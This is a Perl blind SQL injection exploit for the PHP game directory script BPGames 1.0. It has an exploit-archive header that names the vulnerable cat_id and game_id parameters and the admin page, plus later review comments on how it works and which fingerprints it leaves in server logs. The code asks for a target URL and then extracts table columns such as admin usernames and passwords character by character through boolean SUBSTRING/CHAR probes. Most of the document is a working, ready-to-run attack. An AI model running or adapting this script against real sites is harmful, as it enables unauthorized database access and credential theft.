BPGames 1.0 blind SQL Injection
1 #[x]===================================================================[x]
2 # | AntiSecurity[dot]org |
3 #[x]===================================================================[x]
4 # | Title : BPGames 1.0 blind SQL Injection Exploit |
5 # | Software : BPGames |
6 # | Vendor : http://bpowerhouse.info |
7 # | Date : 22 September 2009 ( Indonesia ) |
8 # | Author : OoN_Boy |
9 # | Contact : oon.boy9@gmail.com |
10 # | Web : http://oonboy.info |
11 # | Blog : http://oonboy.blogspot.com |
12 #[x]===================================================================[x]
13 # | Technology : PHP |
14 # | Database : MySQL |
15 # | Version : 1.0 |
16 # | License : GNU GPL |
17 # | Price : $29.90 |
18 # | Description : is a game directory site script. The script |
19 # | supports multi−language settings. Site users |
20 # | can search for games according to categories |
21 #[x]===================================================================[x]
22 # | Google Dork : gwe ganteng :P |
23 #[x]===================================================================[x]
24 # | Exploit : http://localhost/[path]/main.php?cat_id=[sql] |
25 # | http://localhost/[path]/game.php?game_id=[sql]|
26 # | Admin Page : http://localhost/[path]/admin/index.php |
27 #[x]===================================================================[x]
28 # | Greetz : antisecurity.org batamhacker.or.id |
29 # | Vrs−hCk NoGe Paman zxvf Angela Zhang aJe H312Y|
30 # | yooogy mousekill }^−^{ martfella noname s4va |
31 # | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua |
32 # | Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny|
33 #[x]===================================================================[x]
34
35
36 use HTTP::Request;
37 use LWP::UserAgent;
38
# NOTE(review): the script has no `use strict;`/`use warnings;`, so every
# variable assigned here is a package global. `$vuln`, `$string`, `$maxlen`,
# `$target`, `$id` and `$table` are read directly by the subs defined below
# instead of being passed as arguments.
# NOTE(review): the curly quotes `’` and the `−` characters throughout this
# listing are typographic substitutions from the document it was extracted
# from (they stand for `'` and `-`); as extracted, the text is not valid Perl.
$cmsapp = ’BPGames’;
# Query-string prefix the injected condition is appended to (see `exploit`).
$vuln = ’main.php?cat_id=’; #change vuln game.php?game_id=
#vuln = ’game.php?game_id=’;
# Page text whose presence marks a TRUE response. It is interpolated into a
# regex below without quotemeta, so regex metacharacters in it are interpreted.
$string = ’Previous’; #change if any string
#string = ’Instrucciones’;
# Upper bound on the number of character positions probed per column.
$maxlen = 32;

my $OS = "$^O";
# Clear the terminal. The arguments are fixed literals; no user input reaches the shell here.
if ($OS eq ’MSWin32’) { system("cls"); } else { system("clear"); }

# Banner. Note this is printf with an interpolated string as the format; it is
# safe only because $cmsapp is the constant above and contains no `%`.
printf "\n
$cmsapp
[x]=================================================[x]
| BPGames 1.0 blind SQL Injection Exploit |
[x]=================================================[x]

\n";

# Interactive inputs; none are validated beyond chomp.
print " [+] URL Path : "; chomp($web=<STDIN>);
print " [+] Valid ID : "; chomp($id=<STDIN>);
print " [+] Table : "; chomp($table=<STDIN>); #table name admins
print " [+] Columns : "; chomp($columns=<STDIN>); #column username and password

# The scheme check is unanchored: any input containing "http://" anywhere is
# treated as already carrying the scheme; otherwise "http://" is prepended.
if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }

print "\n\n [!] Exploiting $target ...\n\n";
# `&get_data;` (no parens) passes the caller's current @_ through; get_data ignores @_.
&get_data;
print "\n\n [!] Mission completed.\n\n";
67
# Recovers, one character position at a time, the first row's value of each
# requested column by issuing one boolean-based blind probe per candidate
# character (see `exploit`). Reads the globals `$columns`, `$table`, `$maxlen`
# and `$string`; assigns the global `$column` that `exploit` reads.
# Detection note: per column this emits a burst of GET requests to the same
# URL that differ only in the position and CHAR() value of the injected
# SUBSTRING comparison — at most 36 requests per position (digits 0-9, then
# lowercase a-z) for up to $maxlen positions.
# The `()` after the name is an empty prototype, not a signature; the `&get_data;`
# call site bypasses it anyway.
sub get_data() {
# Comma-separated column list entered on STDIN.
@columns = split(/,/, $columns);
foreach $column (@columns) {
print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";
# Unbuffered write so each recovered character appears as soon as it is found.
syswrite(STDOUT, " [−] $table\@$column> ", 255);
for (my $i=1; $i<=$maxlen; $i++) {
my $chr = 0;    # becomes 1 once a candidate matched at position $i
my $found = 0;
my $char = 48;  # '0'
# First pass: digits 48..57.
while (!$chr && $char<=57) {
# TRUE response: the body contains $string (unescaped regex interpolation).
if(exploit($i,$char) =~ /$string/) {
$chr = 1;
$found = 1;
syswrite(STDOUT,chr($char),1);
} else { $found = 0; }
$char++;
}
# Second pass only if no digit matched: lowercase letters 97..122.
# No other code points are ever tried.
if(!$chr) {
$char = 97;
while(!$chr && $char<=122) {
if(exploit($i,$char) =~ /$string/) {
$chr = 1;
$found = 1;
syswrite(STDOUT,chr($char),1);
} else { $found = 0; }
$char++;
}
}
# No candidate matched at this position: treated as end of the value.
if (!$found) {
print "\n"; last;
}
}
}
}
102
# Builds one probe URL for position $limit / candidate code point $chars and
# returns the response body. Reads the globals `$column`, `$table`, `$target`,
# `$vuln` and `$id`. The appended condition is TRUE when the character at
# position $limit of the selected value equals CHAR($chars); the caller
# decides TRUE/FALSE by searching the body for $string.
# Detection note: the literal sequence `AND SUBSTRING((SELECT` ... `)=CHAR(`
# inside a query-string parameter is the fingerprint this tool leaves in
# web-server access logs.
sub exploit() {
my $limit = $_[0];   # 1-based position within the value
my $chars = $_[1];   # candidate character as a decimal code point
my $blind = ’+AND+SUBSTRING((SELECT+’.$column.’+FROM+’.$table.’+LIMIT+0,1),’.$limit.’,1)=CHAR(’.$chars.’)’;
# $target already ends in "/", $vuln ends in "=", so this is host/path + param + id + condition.
my $inject = $target.$vuln.$id.$blind;
my $content = get_content($inject);
return $content;
}
111
# Fetches $url over plain HTTP with a 5-second timeout and returns the
# response body. On an error status (`is_error`) it prints the status line and
# exits the whole script instead of returning to the caller, so a single
# failed probe aborts the extraction mid-value. NOTE(review): LWP presumably
# reports a timeout as a synthesized error response as well, so a slow target
# also ends the run — confirm against the LWP version in use.
sub get_content() {
my $url = $_[0];
my $req = HTTP::Request−>new(GET => $url);
# No User-Agent is set, so LWP's default `libwww-perl/<version>` header is sent —
# presumably another log fingerprint; verify against the installed LWP.
my $ua = LWP::UserAgent−>new();
$ua−>timeout(5);
my $res = $ua−>request($req);
if ($res−>is_error){
print "\n\n [!] Error, ".$res−>status_line.".\n\n";
exit;
}
return $res−>content;
}
124
125 # Exploit End